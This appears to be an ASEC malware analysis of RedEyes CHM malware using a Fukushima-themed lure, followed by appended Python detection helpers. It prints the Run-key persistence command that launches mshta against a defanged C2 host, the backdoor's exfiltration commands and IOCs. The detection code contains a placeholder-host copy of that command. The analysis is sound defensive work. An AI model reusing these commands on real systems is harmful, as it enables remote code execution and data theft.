RedEyes (ScarCruft)’s CHM Malware Using the Topic of Fukushima Wastewater Release - ASEC

By ATCP · Published: 2023-09-03 · Archived: 2026-04-05 19:10:03 UTC

The AhnLab Security Emergency response Center (ASEC) analysis team has recently discovered that the CHM malware, which is assumed to have been created by the RedEyes threat group, is being distributed again. The CHM malware in distribution operates in a similar way to the “CHM Malware Disguised as Security Email from a Korean Financial Company”[1] covered in March of this year, and it also uses the same commands used in the “2.3. Persistence”[2] stage of the attack process of the RedEyes group’s M2RAT malware.

The recent attack used information regarding the release of Fukushima wastewater. By using such a spotlight issue in Korea, the threat actor provokes the user’s curiosity and leads them to open the malicious file. Information about this issue can be seen in the help file window generated when the CHM malware is executed, as shown in Figure 1.

https://asec.ahnlab.com/en/56857/ Page 1 of 5

Figure 2 shows the malicious script that operates during this process. The mshta command used to be executed directly by the CHM file (hh.exe), but the recently distributed file registers the command to the RUN key, enabling it to be run when the system reboots.

RUN key registration
Registry path: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value name: fGZtm
Value: c:\windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 391763 2.2.2.2 || mshta hxxp://navercorp[.]ru/dashboard/image/202302/4.html

When the command registered to the RUN key is executed, an additional script at a certain URL runs through mshta. That URL contains JavaScript (JS) code, which is responsible for executing an encoded PowerShell command. This process is similar in structure to the commands used in the attack process of the previously covered CHM malware and M2RAT malware.
The decoded PowerShell command is a backdoor responsible for registering the RUN key to establish persistence, receiving commands from the threat actor’s server, and transmitting the command execution results. Depending on the commands it receives from the threat actor’s server, it can perform various malicious behaviors such as uploading/downloading files, transmitting information on specific files, and editing the registry.

C2
hxxp://navercorp[.]ru/dashboard/image/202302/com.php?U=[Computer name]-[User name] // Receive the threat actor’s command
hxxp://navercorp[.]ru/dashboard/image/202302/com.php?R=[BASE64 encoding] // Transmit the command execution results

Command    Feature
fileinfo   Saves the list of files and their properties (name, size, last modified time) in a certain path as CSV, transmits this file to the C2 server, then deletes it from the local system
dir        Compresses folders in a certain path, transmits them to the C2 server, then deletes them from the local system
file       Sends (uploads) a certain file to the C2 server
down       Downloads files to a certain path
regedit    Edits the registry
task       Adds a task to the Task Scheduler to be run repeatedly at 10-minute intervals
zip        Decompresses a compressed file in a certain path
rename     Changes the name of a certain file
del        Deletes files in a certain path
Table 1. List of commands received

When a system is infected with this type of malware, it can suffer great damage, since the malware is capable of performing various malicious acts such as downloading additional files and breaching data according to the threat actor’s commands. In particular, malware that targets users in Korea may include information on topics of interest to the user to encourage them to execute the malware, so users should refrain from opening emails from unknown sources and should not execute their attachments.
Users should also regularly scan their PCs and update their security products to the latest engine.

[File Detection]
Downloader/CHM.Generic (2023.09.02.00)

[MD5]
52f71fadf0ea5ffacd753e83a3d0af1a

[URL]
http[:]//navercorp[.]ru/dashboard/image/202302/4[.]html
http[:]//navercorp[.]ru/dashboard/image/202302/com[.]php

Additional IOCs are available on AhnLab TIP. Gain access to related IOCs and detailed analysis by subscribing to AhnLab TIP.

Source: https://asec.ahnlab.com/en/56857/
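As an added example (not code from the ASEC post or from AhnLab), the Python helpers below turn the two behaviours described above into hunting checks: a pattern for the Run-key value chain (PowerShell with execution-policy bypass, a ping that appears to serve only as a delay, then `||` falling through to mshta) and a parser that classifies com.php beacons by their `?U=` check-in and `?R=` Base64 result parameters. The host `c2.example.invalid`, the value `WS01-alice` and the encoded result are constructed placeholders, not indicators from the post.

```python
import base64
import re
from typing import Optional
from urllib.parse import parse_qs, urlparse

# Autorun heuristic: PowerShell with execution-policy bypass, a ping that seems
# to act only as a delay (-n 1 with a very large -w timeout), then "||" falling
# through to mshta fetching a remote URL.
RUN_VALUE_RE = re.compile(
    r"powershell(?:\.exe)?\b.*?-ep\s+bypass.*?ping\s+-n\s+1\s+-w\s+\d{4,}\s+\S+"
    r"\s*\|\|\s*mshta\s+https?://",
    re.IGNORECASE,
)
# C2 path shape from the post (com.php under /dashboard/image/YYYYMM/); the
# host is deliberately not part of the rule.
C2_PATH_RE = re.compile(r"/dashboard/image/\d{6}/com\.php$", re.IGNORECASE)


def inspect_run_value(value: str) -> bool:
    """True if a Run-key value matches the ping-delay || mshta chain."""
    return bool(RUN_VALUE_RE.search(value))


def parse_beacon(url: str) -> Optional[dict]:
    """Classify a com.php request: ?U= is a check-in carrying
    '[Computer name]-[User name]', ?R= carries Base64 command output."""
    parsed = urlparse(url)
    if not C2_PATH_RE.search(parsed.path):
        return None
    qs = parse_qs(parsed.query)
    if "U" in qs:
        return {"type": "checkin", "identity": qs["U"][0]}
    if "R" in qs:
        try:  # binascii.Error is a ValueError subclass
            data = base64.b64decode(qs["R"][0], validate=True)
        except ValueError:
            return {"type": "result", "decoded": None}
        return {"type": "result", "decoded": data.decode("utf-8", "replace")}
    return None


# Constructed samples; c2.example.invalid is a placeholder, not an indicator.
SAMPLE_RUN_VALUE = (
    r"c:\windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden -NoLogo "
    "-NonInteractive -ep bypass ping -n 1 -w 391763 2.2.2.2 || mshta "
    "http://c2.example.invalid/dashboard/image/202302/4.html"
)
SAMPLE_CHECKIN = "http://c2.example.invalid/dashboard/image/202302/com.php?U=WS01-alice"
SAMPLE_RESULT = "http://c2.example.invalid/dashboard/image/202302/com.php?R=ZmlsZWluZm8gZG9uZQ=="
```

Run `inspect_run_value` over exported HKCU\...\Run values and `parse_beacon` over proxy URLs; a decoded `?R=` payload shows what the backdoor reported back for a given command.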